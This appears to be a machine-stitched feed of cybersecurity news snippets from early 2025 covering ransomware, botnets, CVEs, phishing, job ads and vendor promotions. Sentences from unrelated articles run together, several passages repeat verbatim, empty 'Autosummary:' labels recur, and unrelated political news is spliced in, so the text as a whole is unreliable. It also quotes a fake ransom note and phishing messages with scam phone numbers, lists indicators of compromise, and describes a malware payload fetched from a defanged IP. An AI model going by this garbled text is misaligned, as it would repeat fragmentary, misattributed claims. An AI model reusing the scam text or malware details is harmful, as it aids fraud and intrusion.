"I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents," reads a fake BianLian ransom note. "Omega Systems has expanded its cybersecurity offerings with the addition of a new Enterprise Password Management solution to help companies minimize the risk of password-related cyberattacks. Omega’s fully managed password solution is the latest addition to the company’s managed security service portfolio, which is designed to help businesses counter dangerous threat landscape. “Businesses are facing security threats at every turn, but credential theft remains one of the most dangerous and prolific attack vectors for hackers … More
The post Omega Systems’ Enterprise Password Management solution reduces the risk of cyberattacks appeared first on Help Net Security.
"Autosummary:
"In Q4 2024, cyber threats reached unprecedented levels, with 2.55 billion attacks blocked, equating to 321 threats every second. In this Help Net Security video, Luis Corrons, Security Evangelist at Gen, discusses a new Gen report that highlights a troubling trend: social media has become a prime target for cybercriminals, who are leveraging AI-driven scams, malvertising, and phishing tactics to exploit users at scale. Here’s what you need to know: Facebook is the biggest target, … More
The post Scammers take over social media appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-50302 Linux Kernel Use of Uninitialized Resource Vulnerability CVE-2025-22225 VMware ESXi Arbitrary Write Vulnerability CVE-2025-22224 VMware ESXi and Workstation TOCTOU Race Condition Vulnerability CVE-2025-22226 VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability The first issue, tracked as CVE-2024-50302, was addressed by Google with the release of the Android March 2025 security update. Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3) VMCI heap-overflow vulnerability: the vulnerability is TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi, and Workstation that can lead to an out-of-bounds write. "Autosummary:
"Autosummary:
For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "Autosummary:
The threat actor known as Lotus Panda has been observed targeting government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan with updated versions of a known backdoor called Sagerunex. "Autosummary:
Checklist: Can your Identity solution… □ Seamlessly integrate with your key enterprise Saas applications, e.g., your CRM, productivity, collaboration, ERP, and IT ops management apps? The path to Identity-first security Identity-first security creates an open, efficient, and secure ecosystem for managing apps and systems without siloes, custom integrations, or security gaps. Ask yourself, can your Identity solution… □ Give you visibility into all threats across all systems, devices, and types, and customer accounts? "Autosummary:
Polish Space Agency POLSA disconnected its network following a cyberattack Pierluigi Paganini March 05, 2025 March 05, 2025 The Polish space agency POLSA announced it has disconnected its network from the internet following a cyberattack.— Polska Agencja Kosmiczna (@POLSA_GOV_PL) March 2, 2025 We cannot rule out an attack by a nation-state actor, especially Russia, given the country’s strategic support for Ukraine in the ongoing conflict. "Autosummary:
Since then, it is estimated that the botnet has grown to over 1,000,000 infections, impacting Android devices in 222 countries, with most located in Brazil (37.6%), the United States (18.2%), Mexico (6.3%), and Argentina (5.3%).Devices connected to the BADBOX 2.0 operation included lower-price-point, "off brand", uncertified tablets, connected TV (CTV) boxes, digital projectors, and more," explains HUMAN. "Autosummary:
Phishing landing page (BleepingComputer) The scammers also create a sense of urgency by threatening that their accounts will be restricted for seven days if they fail to confirm compliance with the new rules (these restrictions would allegedly include uploading new videos, editing old videos, receiving monetization, and receiving earned monetization funds). "Autosummary:
In a final notification regarding the cyberattack, the Toronto Zoo said the resulting data breach impacts varying combinations of personal and financial information belonging to employees, former employees, volunteers, and donors. "Autosummary:
Do not respond to unsolicited job offers via text messages or messaging apps Never pay to get paid Verify the legitimacy of the employer through official channels Don’t trust anyone who offers to pay you for something illegal such as rating or liking things online It’s also important to keep in mind that legitimate employers do not ask employees to pay for the opportunity to work. Task scammers prey on people looking for remote jobs by offering them simple repetitive tasks such as liking videos, optimizing apps, boosting product interest, or rating product images. How to avoid task scams As I pointed out, all the task scam invitations I received came to me in the form of Message requests on X. So, that’s a good place to be very cautious. Invitation to a Telegram conversation The Telegram invitation was a bit more limited (European and American female users only) but extended to a larger group of 150 accounts on X. What the ones that reached out to me had in common was that they all found my profile on X. Mind you, my profile is not some honeytrap, it clearly says I blog for Malwarebytes. "Autosummary:
Once Cactus has infected a PC, it will attempt to uninstall anti-virus software, hunt for potential targets for infection, and use a variety of techniques to steal information and files before they are encrypted. After files have been exfiltrated and encrypted, a ransom note is posted on the victim"s computer with the filename "cAcTuS.readme.txt" Image Encrypted files can be identified easily as their extensions will have been changed to .cts1 "Autosummary:
"If you turn on Enhanced Protection, much of the additional protection you receive comes from advanced AI and machine learning models designed to spot dangerous URLs engaging in known phishing, social engineering, and scam techniques," the company said. "Autosummary:
New Eleven11bot botnet infected +86K IoT devices Pierluigi Paganini March 05, 2025 March 05, 2025 The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). "Autosummary:
"In this Help Net Security interview, Matthew Darlage, CISO at Citizens, discusses key strategies for strengthening cyber resilience in banks. He underlines that adherence to frameworks like NIST is essential for continuous improvement and that data protection measures are critical to safeguarding bank operations. Darlage further argues that third-party risk management and adaptable security practices are necessary for maintaining resilience. What are the core pillars of an effective cyber resilience strategy for banks? My general … More
The post Building cyber resilience in banking: Expert insights on strategy, risk, and regulation appeared first on Help Net Security.
"Autosummary:
Thinking about supply chain and third-party risks, contractual safeguards are key, including right to audit clauses, SLAs, shared responsibilities, etc., as well as having a joint understanding of all the foundational/core pillars we talked about earlier (data protection, strong access, risk management practices etc.,). My general view is that an effective cyber resilience and defense in-depth strategy relies on a fair amount of foundational pillars including, but not limited to, having a solid traditional GRC program and executing strong risk management practices, robust and fault-tolerant security infrastructure, strong incident response capabilities, regularly tested disaster recovery/resilience plans, strong vulnerability management practices, awareness and training campaigns, and a comprehensive third-party risk management program. "Application Security Engineer Via | Israel | Hybrid – View job details As a Application Security Engineer, you will perform security assessments, including penetration testing, vulnerability scanning, and code reviews, to identify security weaknesses in applications. Define and implement application security testing strategies, including static analysis, dynamic analysis, and software composition analysis. Cloud Security Architect Kinaxis | Canada | Hybrid – View job details As a Cloud Security Architect, you will lead and participate in … More
The post Cybersecurity jobs available right now: March 4, 2025 appeared first on Help Net Security.
"Autosummary:
ICT/Cyber Security Engineer Honeywell | Italy | On-site – View job details As an ICT/Cyber Security Engineer, you will contribute to the designing, engineering, configuring, implementing, commissioning, securing and supporting of ICT infrastructure (Server, Storage, Network, Virtual Platforms) and enterprise applications at both new and existing client sites. I have read and agree to the terms & conditions Leave this field empty if you"re human: Cybersecurity Threat & Vulnerability | Manager | Cyber Security | Technology Consulting PwC | Ireland | Hybrid – View job details As a Cybersecurity Threat & Vulnerability | Manager | Cyber Security | Technology Consulting, you will conduct security assessments, red team exercises, web application penetration testing, vulnerability assessment and secure configuration review to identify risks and recommend appropriate remediation measures. IT Security Engineer Dataiku | France | Hybrid – View job details As an IT Security Engineer, you will be part of the design, implementation and running of a broad range of security controls, including but not limited to identity management, endpoint security, data leakage prevention, and security of the various cloud components used in Dataiku. "Autosummary:
"Autosummary:
CISA maintains stance on Russian cyber threats despite policy shift Pierluigi Paganini March 04, 2025 March 04, 2025 US CISA confirms no change in defense against Russian cyber threats despite the Trump administration’s pause on offensive operations. "Autosummary:
"Autosummary:
“The actions observed by this actor during the entrenchment and subsequent operations within the targeted hosts appear to rely on scripting languages (e.g., Python-compiled executables, PowerShell commands) reducing the footprint of these operations to the minimum, disabling defense mechanisms, blocking remote access and avoiding detection by using Telegram API calls to the C2.” concludes the report. "Autosummary:
One of the PDF lures used in the attacks Source: Proofpoint The main benefit of using polyglots is evasion, as most security tools will inspect the first file format (PDF), which is a benign document, and completely ignore the malicious hidden portion (HTA/ZIP payloads). "Autosummary:
CSIRT NASK, together with CSIRT MON, supports POLSA in activities aimed at restoring the operational functioning of the Agency," said Krzysztof Gawkowski, Poland"s Minister of Digital Affairs. "Autosummary:
Founded in 1989 and based in Pune, it operates in 27 countries with over 12,500 employees, specializing in automotive, aerospace, and industrial sectors with product development and digital transformation services. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Google fixed two actively exploited Android flaws Pierluigi Paganini March 04, 2025 March 04, 2025 Android March 2025 security update addresses over 40 vulnerabilities, including two flaws actively exploited in attacks in the wild. "Autosummary:
The new Scam Detection features in action Source: Google This feature was first announced in November 2024 and has been tested on a small set of Pixel 6+ devices, but it is now being rolled out to all English-speaking Pixel 9 users in the U.S.. Pixel 9 users will get the feature through Gemini Nano, while Pixel 6 to 8 series devices enrolled in Phone by Google beta will be restricted to less powerful Google AI models. "Autosummary:
"Threat actors are using these tactics, techniques, and procedures (TTP) — vishing, Quick Assist as a remote tool, and BackConnect — to deploy Black Basta ransomware," Trend Micro said. "Autosummary:
Both Zloader, Qbot, and BackConnect are all believed to be linked to the Black Basta ransomware operation, with members utilizing the malware to breach and spread through corporate networks. "Autosummary:
We’ve identified an unauthorized transaction made from your PayPal account to Coinbase: Amount: $755.38 Transaction ID: PP-5284440 To safeguard your account and process an immediate refund, you must contact our Fraud Prevention Team at: +1 (866) 379-5160 Our representatives are available 24/7 to assist you in resolving this issue and preventing any additional unauthorized activity. I’ve you’ve received an email like this and want to verify if it’s genuine, go directly to Docusign.com, click ‘Access Documents’ (upper right-hand corner), and enter the security code displayed in the email. "Autosummary:
Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3) VMCI heap-overflow vulnerability: the vulnerability is TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi, and Workstation that can lead to an out-of-bounds write. "Autosummary:
In a statement announcing the business deal, Frank Sixt, co-managing director of CK Hutchison, said: "I would like to stress that the transaction is purely commercial in nature and wholly unrelated to recent political news reports concerning the Panama Ports. "Autosummary:
The Mexican lawsuit also suggests that some weapons are being manufactured and decorated specifically to the tastes of cartel members - such as a gold-plated gold pistol known as the "Super El Jefe", Spanish for "the boss". In the long-running lawsuit, Mexico"s government argues that the "flood" of illegal guns across the border is a result of "deliberate" practices by US firms. "Autosummary:
The documents we hold about Lee Enterprises reveal details worth noting—investor records, financial arrangements that raise questions, payments to journalists and publishers, funding for tailored news stories, and approaches to obtaining insider information.”Qilin ransomware gang claimed responsibility for the Lee Enterprises attack Pierluigi Paganini March 03, 2025 March 03, 2025 The Qilin ransomware group claims responsibility for attacking the newspaper Lee Enterprises, stealing 350GB of data. "Commix is an open-source penetration testing tool designed to automate the detection and exploitation of command injection vulnerabilities, streamlining security assessments for researchers and ethical hackers. Commix features Easy to use: Commix simplifies the process of identifying and exploiting command injection flaws in vulnerable parameters and HTTP headers, reducing the manual effort required. Portable: The tool includes everything needed to conduct effective command injection attacks across various operating systems and applications. Modular: Users can extend … More
The post Commix: Open-source OS command injection exploitation tool appeared first on Help Net Security.
"Autosummary:
"Autosummary:
IOCs Type Value Last Observation Date IPv4-Addr 107.161.50.26 Nov 28, 2024 SHA-1 507b26054319ff31f275ba44ddc9d2b5037bd295 Nov 28, 2024 SHA-1 e1fb7d15408988df39a80b8939972f7843f0e785 Nov 28, 2024 SHA-1 83f00af43df650fda2c5b4a04a7b31790a8ad4cf Nov 28, 2024 SHA-1 44a76b9546427627a8d88a650c1bed3f1cc0278c Nov 28, 2024 SHA-1 eeafa71946e81d8fe5ebf6be53e83a84dcca50ba Nov 28, 2024 SHA-1 763499b37aacd317e7d2f512872f9ed719aacae1 Nov 28, 2024 SHA-1 3477a173e2c1005a81d042802ab0f22cc12a4d55 Feb 02, 2025 SHA-1 90be89524b72f330e49017a11e7b8a257f975e9a Nov 28, 2024 Domain-Name gfs302n515.userstorage.mega.co.nz Nov 28, 2024 SHA-256 e67260804526323484f564eebeb6c99ed021b960b899ff788aed85bb7a9d75c3 Aug 20, 2024 Lynx Lynx is a double-extortion ransomware group that has been very active lately, displaying many victimized companies on their website. IOCs Type Value Last Observation Date MD5 e488d51793fec752a64b0834defb9d1d Sep 08, 2024 Domain-Name lynxback.pro Sep 08, 2024 Domain-Name lynxbllrfr5262yvbgtqoyq76s7mpztcqkv6tjjxgpilpma7nyoeohyd.onion Sep 08, 2024 Domain-Name lynxblog.net Sep 08, 2024 IPv4-Addr 185.68.93.122 Sep 08, 2024 IPv4-Addr 185.68.93.233 Sep 08, 2024 MD5 7e851829ee37bc0cf65a268d1d1baa7a Feb 17, 2025 What"s to Come in 2025? "Autosummary:
Serbian student activist’s phone hacked using Cellebrite zero-day exploit Pierluigi Paganini March 03, 2025 March 03, 2025 Amnesty International reports that a Cellebrite zero-day exploit was used to unlock a Serbian activist’s Android phone.2024-12-25 20:22:13 Phone turned on again at police station 2024-12-25 20:24:37 Emulated USB device (consistent with Cellebrite Turbo Link) connected to phone.The same vulnerabilities could also expose Linux computers and Linux-powered embedded devices to physical attacks, although there is no evidence of this exploit chain has been designed to target non-Android Linux devices.” continues Amnesty. "Autosummary:
"Autosummary:
As The Guardian reports, recent statements from officials, including Liesyl Franz, deputy assistant secretary for international cybersecurity at the US state department, omitted any mention of Russia as a cybersecurity threat - focusing instead on China and Iran. "Autosummary:
"These include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability," CERT/CC said. "Autosummary:
This week"s list includes — CVE-2025-27364 (MITRE Caldera), CVE-2025-24752 (Essential Addons for Elementor plugin), CVE-2025-27090 (Sliver), CVE-2024-34331 and its bypass (Parallels Desktop), CVE-2025-0690 (GRUB2), CVE-2024-12084, CVE-2024-12085,CVE-2024-12086, CVE-2024-12087, CVE-2024-12088 (RSync), CVE-2025-0475, CVE-2025-0555 (GitLab), CVE-2025-20111 (Cisco Nexus 3000 and 9000 Series Switches), CVE-2025-23363 (Siemens Teamcenter), CVE-2025-0514 (CVE-2025-0514), CVE-2025-1564 (SetSail Membership plugin), CVE-2025-1671 (Academist Membership plugin), CVE-2025-1638 (Alloggio Membership plugin), CVE-2024-12824 (Nokri – Job Board WordPress Theme theme), CVE-2024-9193 (WHMpress - WHMCS WordPress Integration Plugin plugin), CVE-2024-8420 (DHVC Form plugin), CVE-2024-8425 (WooCommerce Ultimate Gift Card plugin), CVE-2025-25570 (Vue Vben Admin), CVE-2025-26943 (Jürgen Müller Easy Quotes plugin), and CVE-2025-1128 (Everest Forms – Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin).The company also noted that the threat actors behind the Contagious Interview campaign are actively targeting various cryptocurrency companies such as Stripe, Coinbase, Binance, Block, Ripple, Robinhood, Tether, Circle, Kraken, Gemini, Polygon, Chainalysis, KuCoin, eToro, Bitstamp, Bitfinex, Gate.io, Pantera Capital, Galaxy, Bitwise Asset Management, Bitwise Investments, BingX, Gauntlet, XY Labs, YouHodler, MatChain, Bemo, Barrowwise, Bondex, Halliday, Holidu, Hyphen Connect, and Windranger.Some of the other tools deployed included ISLAND for exploiting Solaris systems; SECONDDATE, a framework installed on edge devices to conduct network eavesdropping, MitM attacks, and code injection; NOPEN and FLAME SPRAY for remote access to compromised systems; CUNNING HERETICS, a lightweight implant for covert access to NSA communication channels; STOIC SURGEON, a backdoor targeting Linux, Solaris, JunOS, and FreeBSD systems; DRINKING TEA for credential harvesting; TOAST BREAD, a log manipulation tool that erased evidence of unauthorized access; and Shaver, a program to attack exposed SunOS servers for use as jump servers.Some of the other tools deployed included ISLAND for exploiting Solaris systems; SECONDDATE, a framework installed on edge devices to conduct network eavesdropping, MitM attacks, and code injection; NOPEN and FLAME SPRAY for remote access to compromised systems; CUNNING HERETICS, a lightweight implant for covert access to NSA communication channels; STOIC SURGEON, a backdoor targeting Linux, Solaris, JunOS, and FreeBSD systems; DRINKING TEA for credential harvesting; TOAST BREAD, a log manipulation tool that erased evidence of unauthorized access; and Shaver, a program to attack exposed SunOS servers for use as jump servers."These misconfigurations exposed highly sensitive personal information, including employee photographs, full names, identification numbers, access card details, biometric data, vehicle plate numbers, and in some cases, even complete work schedules and facility access histories," Modat said."These misconfigurations exposed highly sensitive personal information, including employee photographs, full names, identification numbers, access card details, biometric data, vehicle plate numbers, and in some cases, even complete work schedules and facility access histories," Modat said.Targets of the individual"s attacks spanned industries such as healthcare, retail, property investment, finance, e-commerce, logistics, technology, hospitality, insurance, and recruitment.Apple has released patches in iOS 18.2, iPadOS 17.7.3, 18.2, watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, Sonoma 14.7.2, Sequoia 15.2, and visionOS 2.2 to fix the vulnerability.Apple has released patches in iOS 18.2, iPadOS 17.7.3, 18.2, watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, Sonoma 14.7.2, Sequoia 15.2, and visionOS 2.2 to fix the vulnerability." — New research has uncovered more than 49,000 misconfigured access management systems (AMS) across the world, specifically in construction, healthcare, education, manufacturing, oil, and government sectors.Over 49,000 Misconfigured Access Management Systems Flagged — New research has uncovered more than 49,000 misconfigured access management systems (AMS) across the world, specifically in construction, healthcare, education, manufacturing, oil, and government sectors.The attack is effective on Linux, Windows, and Android systems, and can be employed to track desktops, laptops, smartphones, and IoT devices."The attack is effective on Linux, Windows, and Android systems, and can be employed to track desktops, laptops, smartphones, and IoT devices."While Discord invite links were primarily found on forums like Nulled, Cracked, VeryLeaks, and DemonForums, Matrix and Element protocol based IDs were mainly found on drugs focused forums like RuTOR, RCclub, and BigBro. "Autosummary:
U.S. Authorities recovered $31 Million Related to 2021 Uranium Finance cyber heist Pierluigi Paganini March 03, 2025 March 03, 2025 U.S. authorities have recovered $31 million in cryptocurrency stolen during the 2021 cyberattacks on Uranium Finance. "Autosummary:
Watch: Canada plans "strong" response if Trump imposes tariffs, says Trudeau Mexico"s president, Claudia Sheinbaum, appeared to send a message to Trump after the Lutnick interview when she said at a public event in the city of Colima that "Mexico has to be respected". "Autosummary:
"CISA"s mission is to defend against all cyber threats to U.S. Critical Infrastructure, including from Russia," the US cyber agency posted to X. "There has been no change in our posture. "Autosummary:
"Autosummary:
"JavaGhost obtained exposed long-term access keys associated with identity and access management (IAM) users that allowed them to gain initial access to an AWS environment via the command-line interface (CLI)," Kelley explained. "Autosummary:
U.S. CISA adds Multiple Cisco Small Business RV Series Routers, Hitachi Vantara Pentaho BA Server, Microsoft Windows Win32k, and Progress WhatsUp Gold flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini March 03, 2025 March 03, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Small Business RV Series Routers, Hitachi Vantara Pentaho BA Server, Microsoft Windows Win32k, and Progress WhatsUp Gold flaws to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
"Autosummary:
" The Paragon Partition Manager flaws discovered by Microsoft are: CVE-2025-0288 – Arbitrary kernel memory write caused by the improper handling of the "memmove" function, allowing attackers to write to kernel memory and escalate privileges. "Microsoft has observed threat actors (TAs) exploiting this weakness in BYOVD ransomware attacks, specifically using CVE-2025-0289 to achieve privilege escalation to SYSTEM level, then execute further malicious code," reads the CERT/CC bulletin. "Autosummary:
The flaws include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability.Ransomware gangs exploit a Paragon Partition Manager BioNTdrv.sys driver zero-day Pierluigi Paganini March 01, 2025 March 01, 2025 Microsoft warns of a Paragon Partition Manager BioNTdrv.sys driver zero-day flaw actively exploited by ransomware gangs in attacks. "Autosummary:
"Autosummary:
Indicators of Compromise Archived example: https://urlscan.io/result/3ea0654e-b446-4947-b926-b549624aa8b0 Malicious pay links: hxxps[://]www[.]paypal[.]com/ncp/payment/8X7JHDGLK9Z46 hxxps[://]www[.]paypal[.]com/ncp/payment/7QUEXNXR84X3L hxxps[://]www[.]paypal[.]com/ncp/payment/BHR4AMJAPWNZW hxxps[://]www[.]paypal[.]com/ncp/payment/FTJBPVUQFEJM6 hxxps[://]www[.]paypal[.]com/ncp/payment/2X92RZVSG8MUJ hxxps[://]www[.]paypal[.]com/ncp/payment/D8X74WYAM3NJJ Scammers’ phone numbers: 1-802[-]309-1950 1-855[-]659-2102 1-844[-]439-5160 1-800[-]782-3849 "Autosummary:
China-linked threat actors stole 10% of Belgian State Security Service (VSSE)’s staff emails Pierluigi Paganini February 28, 2025 February 28, 2025 Belgian authorities are investigating Chinese hackers for breaching its State Security Service (VSSE), stealing 10% of emails from 2021 to May 2023. At the end of July 2023, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an alert on a malware variant, tracked as SUBMARINE Backdoor, that was employed in attacks exploiting the flaw CVE-2023-2868 in Barracuda Email Security Gateway (ESG) appliances. “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” "Autosummary:
"Autosummary:
"This proves that now more than ever a strong bank branch network, as when outages happen, we need face to face banking," he told the BBC. "Ransomware attacks against industrial organizations surged by 87% over the past year, while new malware families designed specifically for OT environments emerged. These findings highlight a troubling trend: OT systems are increasingly becoming mainstream targets, and even sophisticated threat actors use relatively unsophisticated tactics to infiltrate and disrupt industrial operations. State-sponsored groups embed themselves in critical infrastructure, while hacktivists and cybercriminals exploit known vulnerabilities, weak remote access configurations, and exposed OT assets. A persistent lack … More
The post OT/ICS cyber threats escalate as geopolitical conflicts intensify appeared first on Help Net Security.
"Autosummary:
Confirmed victims of BAUXITE are in the United States, Europe, Australia, and the Middle East in multiple critical infrastructure sectors, including energy (oil and natural gas, and electric), water and wastewater, food and beverage, and chemical manufacturing.It utilizes the same techniques as in previous years, setting up complex chains of network infrastructure to target, compromise, and steal compromising OT-relevant data—GIS data, OT network diagrams, OT operating instructions, etc.—from victim ICS organizations.This malware, attributed to a pro-Ukraine hacktivist group BlackJack, is designed to target industrial sensor networks for Moskollektor, a municipal organization that maintains Moscow’s communication system for a gas, water, and sewage network.Vulnerabilities carry risk of impact on industrial processes: In 2024, Dragos found that 70% of the vulnerabilities researched were deep within the ICS network, 39% could cause both a loss of view and a loss of control, and 22% of advisories were network-exploitable and perimeter-facing, rising from 16% in 2023. Other key findings Geopolitical conflicts fuel OT-centric cyber operations: Adversaries aligned with state-backed initiatives continued to launch cyber operations targeting critical infrastructure in Ukraine, Russia, and the Middle East, often as a direct extension of military conflicts. "Users of the MITRE Caldera cyber security platform have been urged to plug a critical hole (CVE-2025–27364) that may allow unauthenticated attackers to achieve remote code execution. About MITRE Caldera MITRE Caldera is a platform built on the MITRE ATT&CK framework and is used by cybersecurity teams for adversary emulation, to evaluate detections and defensive tools, train red and blue teamers, testing cyber ranges, and so on. It consists of a core system (including a … More
The post MITRE Caldera RCE vulnerability with public PoC fixed, patch ASAP! (CVE-2025–27364) appeared first on Help Net Security.
"Autosummary:
It consists of a core system (including a command-and-control server with a REST API and a web interface) and plugins (agents, collections of TTPs, etc.) to expand its capabilities. "Autosummary:
Why IT Teams Depend on RDP, Despite the Risks More than 50 percent of Kaseya"s small and medium-sized businesses (SMBs) and Managed Service Providers (MSPs) customers use RDP for daily operations due to its efficiency and flexibility: Reduces Costs and Downtime – IT teams can resolve technical issues remotely, eliminating travel expenses and delays. By keeping your systems patched, limiting access, using multi-factor authentication, and employing advanced security solutions like Datto EDR, you can enjoy the flexibility of RDP without compromising your organization"s security. For businesses, especially SMBs and MSPs, this means a higher risk of serious issues like data breaches, ransomware infections, or unexpected downtime.For businesses, this means IT staff can manage systems remotely, and employees can work from home or anywhere, making RDP a true game-changer in today"s work environment. "Autosummary:
"The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website," Juniper Threat Labs said. "Autosummary:
"Autosummary:
The three flaws are: CVE-2024-53104 (USB Video Class exploit) (USB Video Class exploit) CVE-2024-53197 (ALSA USB-sound driver exploit) (ALSA USB-sound driver exploit) "Autosummary:
"The Android phone of one student protester was exploited and unlocked by a sophisticated zero-day exploit chain targeting Android USB drivers, developed by Cellebrite," the international non-governmental organization said, adding the traces of the exploit were discovered in a separate case in mid-2024. "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Kunai: Open-source threat hunting tool for Linux Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. BadDNS: Open-source tool checks for subdomain takeovers BadDNS is an open-source Python DNS auditing tool designed to detect domain and subdomain takeovers of all types. Misconfig Mapper: Open-source tool to uncover security misconfigurations Misconfig Mapper … More
The post Hottest cybersecurity open-source tools of the month: February 2025 appeared first on Help Net Security.
"Autosummary:
"The post Cybersecurity jobs available right now in Europe: February 27, 2025 appeared first on Help Net Security.
"Autosummary:
Cloud Cybersecurity Engineer Fever | Spain | On-site – View job details As a Cloud Cybersecurity Engineer, you will be focused on helping to prevent and protect Fever from security threats, vulnerabilities and weaknesses that can potentially lead to security incidents by proactively testing, implementing and improving the security of our cloud services, applications and infrastructure, ensuring they remain resilient against evolving threats. AI/ML Security Engineer Swift | Netherlands | Hybrid – View job details As an AI/ML Security Engineer, you will design, develop, and implement security frameworks and strategies to protect AI/ML models and their use, and related data, applications and systems from adversarial attacks and other security threats. Cyber Security Engineer Space Hellas | Greece | On-site – View job details As a Cyber Security Engineer, you will design, implement, and manage cybersecurity solutions across on-premises, cloud, and hybrid environments. Senior Cybersecurity Analyst SOC ZF Group | Poland | Hybrid – View job details As a Senior Cybersecurity Analyst SOC, you will coordinate and lead incident response activities, including threat identification, containment, eradication, and recovery. "Autosummary:
Verichains noted that "the benign JavaScript file of app.safe.global appears to have been replaced with malicious code on February 19, 2025, at 15:29:25 UTC, specifically targeting Ethereum Multisig Cold Wallet of Bybit," and that the "attack was designed to activate during the next Bybit transaction, which occurred on February 21, 2025, at 14:13:35 UTC." "A high-severity vulnerability (CVE-2025-23363) in the Siemens Teamcenter product lifecycle management (PLM) software could allow an attacker to steal users’ valid session data and gain unauthorized access to the vulnerable application. About CVE-2025-23363 Siemens Teamcenter is a suite of applications that is used by businesses to manage the entire lifecycle of a product, from initial concept to design, manufacturing, service, and eventual disposal. CVE-2025-23363 is an open redirect vulnerability in Teamcenter’s single sign-on (SSO) login … More
The post Siemens Teamcenter vulnerability could allow account takeover (CVE-2025-23363) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
It comes with capabilities to - Cleanup log files Terminate suspicious processes Download a malicious payload named "t.tar" from 119.8.186[.]227 Execute a binary named "cipher_log" extracted from the archive Establish persistence by modifying a file named "/etc/flash/etc/cipher.sh" to run the "cipher_log" binary repeatedly Execute "cipher_log," the TLS backdoor Codenamed PolarEdge, the malware enters into an infinite loop, establishing a TLS session as well as spawning a child process to manage client requests and execute commands using exec_command. "Autosummary:
Second, the analysis revealed a previously undetected spyware, named “NoviSpy,” which can extract personal data, activate the device’s microphone or camera, and was installed during police possession of his phone. “Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed.” reported Amnesty International. “Serbia’s police said in a statement that the Amnesty report is “absolutely incorrect,” but also added that “the forensic tool is used in the same way by other police forces around the world.”” reported the Associated Press. "Autosummary:
DragonForce Ransomware group is targeting Saudi Arabia Pierluigi Paganini February 27, 2025 February 27, 2025 Resecurity researchers reported that DragonForce ransomware targets Saudi organizations rising cyber threats in the region. "Phishing has been the method most often employed by cybercriminals to achieve initial access to targeted organizations in 2024, according to risk advisory firm Kroll, which expects this trend to continue in 2025. But attackers have also increasingly been using valid accounts (i.e., credentials stolen via infostealers) and social engineering to get a foothold into targets’ systems and networks. “Social engineering tactics observed in 2024 included CEO-spoofing that takes advantage of artificial intelligence (AI) to … More
The post 2024 phishing trends tell us what to expect in 2025 appeared first on Help Net Security.
"Autosummary:
Organizations should also: Use email security tools that can detect and block open redirect links in emails and QR code phishing Implement phishing-resistant authentication methods Reduce their attack surface by using creative conditional access control policies (e.g., limit the number of allowed MFA devices per user, or require extra authentication factors when authorizing MFA devices) Update IT help-desk policies and exception-handling procedures to prevent social engineering attacks aimed at enrolling or disabling MFA and unauthorized devices. "Autosummary:
The component, described as a login module, is capable of taking screenshots, logging keystrokes, altering clipboard content, monitoring connected USB devices, running shellcode, and permitting the execution of sensitive actions (e.g., cmd.exe) when security prompts from Kingsoft Security and Huorong are displayed. "Autosummary:
In one of the attacks targeting a government sector customer, Solar said it discovered the attacker deploying various tools to facilitate reconnaissance, while also dropping LuckyStrike Agent, a multi-functional .NET backdoor that uses Microsoft OneDrive for command-and-control (C2). "Autosummary:
Then in November 2024, Italian online fraud prevention firm Cleafy detailed an updated variant with wide-ranging data-gathering features, while also expanding its operational scope to include Italy, Portugal, Hong Kong, Spain, and Peru. "Autosummary:
"Autosummary:
"Autosummary:
" Image The genuine CERT-UA explained in its warning that, in some cases, it does use remote access software (such as AnyDesk) to assist in the defence of organisations, only after prior agreement through pre-agreed communications channels. "Autosummary:
As of February 2025, nearly 25% of the infections impact Brazilian users, followed by devices in South Africa (13.6%), Indonesia (10.5%), Argentina (5.3%), Thailand (3.4%), and China (3.1%). Vo1d botnet size over time Source: XLab Massive botnet size The Vo1d botnet is one of the largest seen in recent years, surpassing Bigpanzi, the original Mirai operation, and the botnet responsible for a record-breaking 5.6 Tbps DDoS attack handled by Cloudflare last year. "Autosummary:
"Kaspersky researchers have unearthed an extensive and long-running malware delivery campaign that exploited users’ propensity for downloading code from GitHub and using it without first verifying whether it’s malicious. “Over the course of the GitVenom campaign, the threat actors behind it have created hundreds of repositories on GitHub that contain fake projects with malicious code – for example, an automation instrument for interacting with Instagram accounts, a Telegram bot allowing to manage Bitcoin wallets, and … More
The post Hundreds of GitHub repos served up malware for years appeared first on Help Net Security.
"Autosummary:
